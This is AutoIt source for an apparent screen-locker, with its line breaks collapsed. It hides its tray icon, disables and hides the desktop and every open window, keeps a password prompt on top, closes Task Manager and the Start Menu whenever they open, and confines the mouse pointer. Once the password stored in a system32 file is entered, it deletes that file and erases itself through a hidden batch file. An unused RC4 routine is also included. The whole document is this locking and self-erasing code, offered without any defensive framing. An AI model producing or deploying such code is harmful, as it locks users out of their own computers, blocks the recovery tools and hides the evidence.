#include Opt("TrayIconHide", 1) $password1 = FileReadLine("c:/Windows/system32/wm23.txt", 1) lock() Global $var = WinList() $xAve = (700 + 315) / 2 $yAve = (340 + 440) /2 $name = Random (-99999, 99999) WinMinimizeAll() $style = BitOR($WS_POPUP, $WS_SYSMENU) For $i = 1 to $var[0][0] WinSetState($var[$i][0], "", @SW_DISABLE) Next GuiCreate($name, 490, 40,(@DesktopWidth-490)/2, (@DesktopHeight-40)/2 , $style, $WS_EX_ACCEPTFILES + $WS_EX_TOOLWINDOW) WinSetOnTop($name, "", 1) $Input = GuiCtrlCreateInput("", 10, 10, 370, 20, 0x0020) $Button = GuiCtrlCreateButton("Check Password", 390, 10, 90, 20, 0x0001) GuiSetState() While 1 $msg = GuiGetMsg() Select Case $msg = $GUI_EVENT_CLOSE ;;; Case $msg = $Button $password2 = GUIRead($input) If $password2 = $password1 Then escape() EndIf EndSelect If WinExists ("Windows Task Manager") then WinClose ("Windows Task Manager") EndIf If WinExists ("Start Menu") then WinClose ("Start Menu") EndIf $pos = MouseGetPos() If $pos[0] < 250 or $pos[0] > 740 Then MouseMove($xAve, $pos[1], 0) If $pos[1] < 350 or $pos[1] > 410 Then MouseMove($pos[0], $yAve, 0) WEnd Func lock() WinSetState("Program Manager", "", @SW_DISABLE) WinSetState("Program Manager", "", @SW_HIDE) EndFunc Func escape() WinSetState("Program Manager", "", @SW_ENABLE) WinSetState("Program Manager", "", @SW_SHOW) For $i = 1 to $var[0][0] WinSetState($var[$i][0], "", @SW_ENABLE) Next FileDelete("c:/Windows/system32/wm23.txt") _selfdestruct() EndFunc Func RC4($Data, $Phrase, $Decrypt) Local $a, $b, $i, $j, $k, $cipherby, $cipher Local $tempSwap, $temp, $PLen Local $sbox[256], $key[256] $PLen = StringLen($Phrase) For $a = 0 To 255 $key[$a] = Asc(StringMid($Phrase, Mod($a, $PLen) + 1, 1)) $sbox[$a] = $a Next $b = 0 For $a = 0 To 255 $b = Mod( ($b + $sbox[$a] + $key[$a]), 256) $tempSwap = $sbox[$a] $sbox[$a] = $sbox[$b] $sbox[$b] = $tempSwap Next If $Decrypt Then For $a = 1 To StringLen($Data) Step 2 $i = Mod( ($i + 1), 256) $j = Mod( ($j + $sbox[$i]), 256) $k = $sbox[Mod( ($sbox[$i] + $sbox[$j]), 256) ] $cipherby = BitXOR(Dec(StringMid($Data, $a, 2)), $k) $cipher = $cipher & Chr($cipherby) Next Else For $a = 1 To StringLen($Data) $i = Mod( ($i + 1), 256) $j = Mod( ($j + $sbox[$i]), 256) $k = $sbox[Mod( ($sbox[$i] + $sbox[$j]), 256) ] $cipherby = BitXOR(Asc(StringMid($Data, $a, 1)), $k) $cipher = $cipher & Hex($cipherby, 2) Next EndIf Return $cipher EndFunc Func _SelfDestruct() FileWrite(@scriptdir & "\doom.bat",':begin' & @crlf & 'del "' & @ScriptFullPath & _ '"' & @crlf & 'If exist "' & @ScriptFullPath & '" goto begin' & @crlf & _ 'del .\doom.bat') Run(@scriptdir & "\doom.bat",@scriptdir,@sw_hide) Exit EndFunc